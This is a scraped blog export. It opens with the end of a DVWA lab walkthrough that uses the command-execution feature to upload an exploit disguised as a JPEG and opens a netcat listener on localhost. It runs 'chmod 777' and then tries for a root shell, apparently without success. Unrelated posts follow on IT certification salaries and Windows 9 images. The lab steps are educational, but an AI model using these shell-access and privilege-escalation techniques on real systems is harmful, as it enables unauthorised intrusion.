<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhse_niAcP7Ho5uBGP6dqfLwLb9kLy2iylHdRnfrRBV7JjbuMyyiMlBOelMiTQ9VFhSKXcWeGSXDiYuRHNUKIKXnWnhgFuwdjQIGjI23M5204CoXSbRHt8S1MiaLKjzuKwjf7Twn68zQ0U/s1600/Selection_020.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhse_niAcP7Ho5uBGP6dqfLwLb9kLy2iylHdRnfrRBV7JjbuMyyiMlBOelMiTQ9VFhSKXcWeGSXDiYuRHNUKIKXnWnhgFuwdjQIGjI23M5204CoXSbRHt8S1MiaLKjzuKwjf7Twn68zQ0U/s320/Selection_020.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Good. Now, lets connect to the server using netcat to execute that exploit.</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Back to "Command Execution" feature. (Don't forget to change the dvwa security to medium again)</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Lets see if the exploit is correctly uploaded.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwG5jw4EC2XdihRbjg0v0VHG86VJ6Oj258pDsy6ZngSHQphKJMoHHSsPGPjB4vudIspizbCHXgo0LFt49v7lZHR0y4vAX5duXMNvDuPOVojtKCHa1XQRCEzBODdQmjQwNjPuEHoWBZ1Y/s1600/Selection_021.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiwG5jw4EC2XdihRbjg0v0VHG86VJ6Oj258pDsy6ZngSHQphKJMoHHSsPGPjB4vudIspizbCHXgo0LFt49v7lZHR0y4vAX5duXMNvDuPOVojtKCHa1XQRCEzBODdQmjQwNjPuEHoWBZ1Y/s320/Selection_021.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Now, execute netcat on the dvwa on listening mode.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizItzJpGIPa2N57Fad_XkmWLbo647GJOq0nUULfspoJijaliK20FQPJoIOUBy__jU2WW-NBi1iAIKYqJhWGxI5TolKYQpQT1T7RrMhwifyjr_-d0utXxV147nWTk406kmsTyPMltdr6XM/s1600/Selection_022.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="97" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizItzJpGIPa2N57Fad_XkmWLbo647GJOq0nUULfspoJijaliK20FQPJoIOUBy__jU2WW-NBi1iAIKYqJhWGxI5TolKYQpQT1T7RrMhwifyjr_-d0utXxV147nWTk406kmsTyPMltdr6XM/s320/Selection_022.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Look on the bottom/status bar. The browser will wait for a connection. In backtrack's terminal type this. "nc 127.0.0.1 4321"</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5n7rN9KdSaGDrxi0jYEJqjE0G4xpaMq13v0u6Vsi9UdLmcgPbYr3kMe-Y95vdREaMbq0AMC9dqB2QvCpN7qXZnk6mJ6nqG5RAxi9s_MAEs9DNXnOuubs0zKcT-cA2RqMvNrv0_lYI8co/s1600/Selection_023.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5n7rN9KdSaGDrxi0jYEJqjE0G4xpaMq13v0u6Vsi9UdLmcgPbYr3kMe-Y95vdREaMbq0AMC9dqB2QvCpN7qXZnk6mJ6nqG5RAxi9s_MAEs9DNXnOuubs0zKcT-cA2RqMvNrv0_lYI8co/s1600/Selection_023.png" style="border-width: 0px;" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJDPk52u8lGxBRR3zLDGKMYsgcvtlh1TaKu6BUmtVoGqEdjjqDEcoKJjtBpowIqGDiKzV-LuEyBDqIEJygTzqRPXpr3zf0rVYizmLrDZ9HFxWXhdwY3aEPtbl_v8A0VItoxfmay3O4P24/s1600/Selection_024.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJDPk52u8lGxBRR3zLDGKMYsgcvtlh1TaKu6BUmtVoGqEdjjqDEcoKJjtBpowIqGDiKzV-LuEyBDqIEJygTzqRPXpr3zf0rVYizmLrDZ9HFxWXhdwY3aEPtbl_v8A0VItoxfmay3O4P24/s320/Selection_024.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Then, move to the directory where the exploit is located.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFgaHtIa7Btx_qlFgGLr_wgJ-QSCfpv31A2o8AjK56nTTVX2EVClCE2n9koALVg5wx1GuTEDWM0y7cjFMkXd_hhTq9Wvx1W4G4ekDKacW-28r7qBdifluk9Y18RPvHZ0G5mMmUbbvb4F0/s1600/root@bt:+-var-www-files_025.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFgaHtIa7Btx_qlFgGLr_wgJ-QSCfpv31A2o8AjK56nTTVX2EVClCE2n9koALVg5wx1GuTEDWM0y7cjFMkXd_hhTq9Wvx1W4G4ekDKacW-28r7qBdifluk9Y18RPvHZ0G5mMmUbbvb4F0/s320/root@bt:+-var-www-files_025.png" style="border-width: 0px;" width="320" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="font-family: Verdana, sans-serif;"><div style="text-align: left;">
<span style="line-height: 1.6em;">- Execute it. </span><span style="line-height: 1.6em;"> </span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKZhrjcK8rppItAeOZ1ot9-MoheBbyGJExO6LbEF1pHApkseUysA050hO-Ti6jSMyMg1rFBu39a5NJKD7LdwTkA08fz-nyprSsIxoYlPdxRjFxEbln8iTzSIOMWlFmqgwLlcDugk_Y58g/s1600/Selection_026.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKZhrjcK8rppItAeOZ1ot9-MoheBbyGJExO6LbEF1pHApkseUysA050hO-Ti6jSMyMg1rFBu39a5NJKD7LdwTkA08fz-nyprSsIxoYlPdxRjFxEbln8iTzSIOMWlFmqgwLlcDugk_Y58g/s1600/Selection_026.png" style="border-width: 0px;" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Not good, the exploit didn't work properly. =,=</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Turns out that I haven't change the permission to execute the exploit. :P</span></div>
</span><span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- To change it simply type "chmod 777 exploit.jpeg"</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwKJkJd0Tfre6T9w2h8tPprj4bOxoktz7vhNQUU73M2NVoStjTb-PFtOGDHOabiTG-KV7LezIrmEiIv2YYQMlLr1FEZTBEM-9jvnnoh-Kk9DHJARdS0ygYVmU7QWovxgN30E2z1131bMU/s1600/Selection_027.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwKJkJd0Tfre6T9w2h8tPprj4bOxoktz7vhNQUU73M2NVoStjTb-PFtOGDHOabiTG-KV7LezIrmEiIv2YYQMlLr1FEZTBEM-9jvnnoh-Kk9DHJARdS0ygYVmU7QWovxgN30E2z1131bMU/s400/Selection_027.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">- Next, lets try to execute it again.</span></div>
</span><div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhphkA4wFDt86rPrlVsd8fyOVophsF0SOFI7PuJoUbnHCp5kj5TcOezHRvJcYzSOZsz4ItqXjhf61xr2_vQerjbMiQobhZX76Ug_mMkLIK3O_t8lXFkxFUxQ5qpZSb8UQJ46N2QWvFE9AY/s1600/Selection_028.png" imageanchor="1" style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhphkA4wFDt86rPrlVsd8fyOVophsF0SOFI7PuJoUbnHCp5kj5TcOezHRvJcYzSOZsz4ItqXjhf61xr2_vQerjbMiQobhZX76Ug_mMkLIK3O_t8lXFkxFUxQ5qpZSb8UQJ46N2QWvFE9AY/s400/Selection_028.png" style="border-width: 0px;" width="400" /></a></span></div>
<div style="line-height: 1.6em; margin-left: 1em; margin-right: 1em; text-align: left; text-decoration: none;">
<br /></div>
<span style="line-height: 1.6em;"><div style="text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: 1.6em;">-Its running. But the process to spawn a root shell is taking so long. I wonder if the exploit is succeeded. Have to research more.. :)</span></div>
</span></span><br />
<div style="text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
</div>
<span style="font-family: Verdana, sans-serif;"><a href="https://www.blogger.com/null" name="more"></a></span><div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
</div>
<div style="font-family: Verdana, sans-serif; text-align: left;">
<span style="color: #0000ee;"><br /></span></div>
</div>
</div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-89147053081894632592014-02-22T03:40:00.000-05:002014-02-22T03:45:32.682-05:00Top 10 Highest Paying Computer/ IT Courses<div dir="ltr" style="text-align: left;" trbidi="on">
<h4 style="text-align: left;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-q8YMcQPqMrvLqJIVm_WCGXZIoHtka9pq_s0MXE7ZfXtm4fkXP3BjP8mI_n7JFwTB8jrlwlP5TzL7VJCm7uwBp0cCdNsJs8TcyYgfR0FAySsEDkdjP11iulL3YsCAUOUiO1zx35NvIas/s1600/Learn.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-q8YMcQPqMrvLqJIVm_WCGXZIoHtka9pq_s0MXE7ZfXtm4fkXP3BjP8mI_n7JFwTB8jrlwlP5TzL7VJCm7uwBp0cCdNsJs8TcyYgfR0FAySsEDkdjP11iulL3YsCAUOUiO1zx35NvIas/s1600/Learn.jpg" height="212" width="320" /></a></div>
Number 10 : CCNP : Cisco Certified Network Professional :</h4>
Requirements : Cisco CCNA Routing and Switching Certifications.
<br />
<br />
At number 10 we have Cisco Certified Network Professional [CCNP] Certification, Though being the most popular choice of college students, It is not the highest paying certification in our list. If you want to be in a network technician, support engineer, systems engineer or network engineer The CCNP certification is for you.
<br />
<br />
<div style="text-align: left;">
Certification Exam Cost : 300 $</div>
<br />
Average Salary : 80,750 $
<br />
<br />
<br />
<h4 style="text-align: left;">
Number 9 : MCITP : Database Administrator :</h4>
<div style="text-align: left;">
Requirements : Pass the Microsoft Certified Technical Specialist certification in SQL Server 2008.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Running on number 9, we have Microsoft Certified IT Professional [MCITP] Certification, To do this, you have to take exam 70-432 and 70-450, The MCITP certification validates that the IT professional is capable of deploying, building, designing, optimizing, and operating technologies for a particular job role. MCITP certifications builds on the technical proficiency .measured in the Microsoft Certified Technology Specialist (MCTS) certifications.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Certification Exam Cost : 80$ Per Paper.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Average Salary : 90,200 $.</div>
<br />
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
Number 8 : ITIL V3 Certification :</h4>
<div style="text-align: left;">
Requirements :</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
ITIL stands for: Information Technology Infrastructure Library. It is useful for people who's organization has ITIL Framework. This certification exam gives you knowledge of Service Strategy, Service Design, Service Transition, Service Operation and Continual Service Improvement. </div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Certification Exam Cost : 150 $.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Average Salary : 91,000 $</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<h4 style="text-align: left;">
Number 7 : VCP Certification :</h4>
<div style="text-align: left;">
Requirements : Coaching From a VCP Certified Centre : 2400 $</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
In this world where virtualization is taking a major role, VMware is one of the leading vendors of virtualization products and earning a VMware certification is the first step toward gaining industry-recognized expertise in virtual infrastructure. Earning the VCP certification demonstrates that you can successfully install, deploy, scale, and manage VMware vSphere environments. The people with VMware knowledge are in very high demand but the course cost is too much, that's why it has landed on our 7th spot.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Certification Exam Cost : 175 $ + 2400 $ Coaching Classes.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Average Salary : 93,000 $</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<h4 style="text-align: left;">
Number 6 : MCAD : Microsoft Certified Application Developer :</h4>
<div style="text-align: left;">
Requirements : None.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Good at developing applications ? Then the Microsoft Certified Application Developer [MCAD] Certification is for you. Running at position 6, MCAD Certification tells the world that you are ready to deploy powerful applications using Microsoft Visual Studio .NET and Web services. The Responsibilities include implementing requirements, developing, testing, deploying, and maintaining department-level applications components, Web or desktop clients, or back-end data services by using Microsoft tools and technologies.</div>
<br />
Certification Exam Cost : 500-600 $, 3 Exams Each of 125 $ and 2 MS prep kits.
<br />
<br />
Average Salary : 94,000 $
<br />
<br />
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
Number 5 : CCDA: Cisco Certified Design Associate :</h4>
<div style="text-align: left;">
</div>
The Cisco Certified Design Associate (CCDA) tells your employer that you have a strong foundation and apprentice knowledge of network design for Cisco converged networks. A CCDA certification is for network design engineers, technicians, and support engineers, who enable efficient network environments. This certification will help you in giving a better knowledge of LAN, WAN, and broadband access for businesses and organizations.
<br />
<br />
What is the difference between CCNA and CCDA ?
<br />
The job roles between a CCNA and CCDA are different. The CCNA is a configuration and troubleshooting exam. The CCDA indicates a foundation knowledge of network design for the Cisco converged network. CCDA certified professionals can design routed and switched network infrastructures and services involving LAN, WAN, and broadband access for businesses and organizations. Also CCDA pays a lot better !
<br />
<br />
Certification Exam Cost : 150 $
<br />
<br />
Average Salary : 95,000 $
<br />
<br />
<br />
<h4 style="text-align: left;">
Number 4 : MCDBA: Microsoft Certified Database Administrator :</h4>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
The Microsoft Certified Database Administrator credential provides database professionals with an opportunity to showcase their SQL Server skills. If you'd like to prove your prowess to a prospective employer, take a step up the career ladder in your current job, or simply earn a nice certificate to hang on the wall, the MCDBA credential may be a great step for you. The main reason It is on our 4 position is because the MCDBA certification has a great demand in the market.
<br />
<br />
Certification Exam Cost : 450 $
<br />
<br />
Average Salary : 96,000 $
<br />
<br />
<br />
<h4 style="text-align: left;">
Number 3 : Certified Information Systems Security Professional :</h4>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Requirements : To gain CISSP certification, you need to have five years of Infosec experience (or four years and a degree) and endorsement from another CISSP, plus you have to score at least 70 percent on a 250-question multiple-choice test. Also a clean history (no criminal records0.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Running at number 3, We have Certified Information Systems Security Professional [CISSP] Certification, A must have certification degree for computer security specialist, The CISSP is one of the most recognized degree in the world. But getting this degree is a lot of trouble, If you think you want to avoid it, There are some alternatives to this degree like : CEH, CISA And OSCP. Actually a lot of people now consider having a CEH Degree instead of CISSP. But it doesn't pay as much as CISSP.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Certification Exam Cost : 550 $ + 85 $ Per year Maintenance Fee.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Average Salary : 100,000 $.</div>
<h4 style="text-align: left;">
</h4>
<h4 style="text-align: left;">
Number 2 : PMI Certified Associate in Project Management :</h4>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Requirements : High School Diploma + 1,500 hours of project experience.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Certification Exam Cost : 300 $</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Average Salary : 101,105 $.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<h4 style="text-align: left;">
Number 1 : PMI Project Management Professional :</h4>
<div style="text-align: left;">
Requirements : 4,500 hours leading and directing projects and 35 hours of project management education.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
On position 1, The Project Management Professional Certification by Project Management Institute is recognized as the most important certification for project managers. It is globally acknowledged, in heavy demand, and highly sought after by corporations and individuals alike. A Project Management Professional designation demonstrates that you have not only the experience but also the education to successfully lead and direct projects. That means once you have got the PMP Certification, you'll be playing in money, Just like a PIMP.</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Certification Exam Cost : For PMI Member : 250 $, For Non PMI Member : 400 $</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
Average Salary : 110,750 $</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-65612886074082308462013-12-27T03:14:00.001-05:002013-12-27T03:16:17.048-05:00Windows 9 Lookkkk<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz14ROAE09ZuzZuuN4TLDnR9-UY9uik9fb4mwLv6mPr3TKLK-_VTK199HNWpHOda0TLPfDWd7JWpsubWcZFJLQys2VM-v21vyiIXnmTlARBlE2eEbcEd54MYxyFAjctTB1IBJU7O3em1Q/s1600/windows-9-580-90.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz14ROAE09ZuzZuuN4TLDnR9-UY9uik9fb4mwLv6mPr3TKLK-_VTK199HNWpHOda0TLPfDWd7JWpsubWcZFJLQys2VM-v21vyiIXnmTlARBlE2eEbcEd54MYxyFAjctTB1IBJU7O3em1Q/s1600/windows-9-580-90.png" /></a><br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMQH5ziMks_pcV8wxjquCB3Tx16Kn68XmxbBxcx7H1m_l_ws-I07betpuEj9qUqya6udayVhNSARQoFjn-jwnu-LOUY0CmfRx78mN2ZJeYDF9IptGKe5GppUxMzTKbyjmOhntovOP-P3A/s1600/2-smalld-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMQH5ziMks_pcV8wxjquCB3Tx16Kn68XmxbBxcx7H1m_l_ws-I07betpuEj9qUqya6udayVhNSARQoFjn-jwnu-LOUY0CmfRx78mN2ZJeYDF9IptGKe5GppUxMzTKbyjmOhntovOP-P3A/s1600/2-smalld-1.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNENBM8SRl2O8M-DdFFxJKhITteWAL3H5oHO4DroDgOatMbX4aFo0Bp11GoHTnLxXtOcrgW2HWB5HTZqM347ltdZ0z-KSWb6aobY_epCuSiCD6e0fl84s5NRpigUyP6mSBtcOwXGu2u2o/s1600/1-smalla-2-620x388.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNENBM8SRl2O8M-DdFFxJKhITteWAL3H5oHO4DroDgOatMbX4aFo0Bp11GoHTnLxXtOcrgW2HWB5HTZqM347ltdZ0z-KSWb6aobY_epCuSiCD6e0fl84s5NRpigUyP6mSBtcOwXGu2u2o/s1600/1-smalla-2-620x388.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEzNLmxJyT2J36cwAxqC50ehru1WEDELs18bQghhB_0ZZRMScXQEBBkmP6lMT4AUI-Lo8YM6q-tzjFomlQK7vXcYCk_KKqSA8x6jEqIKxbDQR1i5IjiI078PgzXUUTivc7gpn165rA3Dw/s1600/1-smalla-3-620x365.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEzNLmxJyT2J36cwAxqC50ehru1WEDELs18bQghhB_0ZZRMScXQEBBkmP6lMT4AUI-Lo8YM6q-tzjFomlQK7vXcYCk_KKqSA8x6jEqIKxbDQR1i5IjiI078PgzXUUTivc7gpn165rA3Dw/s1600/1-smalla-3-620x365.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjf2JURBCpI35XjxD21nNjvdNokIUb7-xI4Y7P_yTIJxXoKLuFKQLBB_8Km1CCX9UjVbVyigRIgGyxvJq4o5-vJgvPApovVYqeg33HG13G76tTgi6C-Ivr3QUsnGPAhXTyyZdod4PtymrE/s1600/1-smalla-4-620x388.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjf2JURBCpI35XjxD21nNjvdNokIUb7-xI4Y7P_yTIJxXoKLuFKQLBB_8Km1CCX9UjVbVyigRIgGyxvJq4o5-vJgvPApovVYqeg33HG13G76tTgi6C-Ivr3QUsnGPAhXTyyZdod4PtymrE/s1600/1-smalla-4-620x388.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpdRb0hEL50CyM16tBHbDmx6PTNUreC5BzC88ra2MJIY-i8dnAEYy6n6FKI3bCELpnnZGlQHB1x-H8vOYS6pUcbfwu_uWHqo7Nnto8YXQ03b9zOSsw-Y_ClDXAl3lriASmwBGI-YThxJc/s1600/1-smalla-5-620x388.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpdRb0hEL50CyM16tBHbDmx6PTNUreC5BzC88ra2MJIY-i8dnAEYy6n6FKI3bCELpnnZGlQHB1x-H8vOYS6pUcbfwu_uWHqo7Nnto8YXQ03b9zOSsw-Y_ClDXAl3lriASmwBGI-YThxJc/s1600/1-smalla-5-620x388.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW8f3QgxXc0bIJSKnrm586F5vG1qAIKsvn127uIZEPrLPQ18Kytl8ju3WD4HayGfy0lY6TVAhw9jbEtzGlXkmIZlZzp49Ehkn6PqZktB_4bjLb45uoiVDAq-pd2Iilk4RMVjqb9HDyd88/s1600/2-smallb-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW8f3QgxXc0bIJSKnrm586F5vG1qAIKsvn127uIZEPrLPQ18Kytl8ju3WD4HayGfy0lY6TVAhw9jbEtzGlXkmIZlZzp49Ehkn6PqZktB_4bjLb45uoiVDAq-pd2Iilk4RMVjqb9HDyd88/s1600/2-smallb-2.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEBND8t5PzBz8S1DRsq3yO_Ysa8r5Gi7QJT7-I5uWHBE3npkIXi5zz4ZAOKJg1Yf_Ff5KNGP6cEi9vsMTnFHyv2M57jgsnxInjG9KplYHDZzipGR__FkPjMD2yT778BsC2ffrW0E8XVzc/s1600/1-smalla-1-620x388.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEBND8t5PzBz8S1DRsq3yO_Ysa8r5Gi7QJT7-I5uWHBE3npkIXi5zz4ZAOKJg1Yf_Ff5KNGP6cEi9vsMTnFHyv2M57jgsnxInjG9KplYHDZzipGR__FkPjMD2yT778BsC2ffrW0E8XVzc/s1600/1-smalla-1-620x388.jpg" /></a></div>
<br /></div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com1tag:blogger.com,1999:blog-5858162330672279498.post-75004480279634713692013-12-23T04:15:00.001-05:002013-12-23T05:29:50.616-05:00Top 10 Searched Peoples In Google Search 2013<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
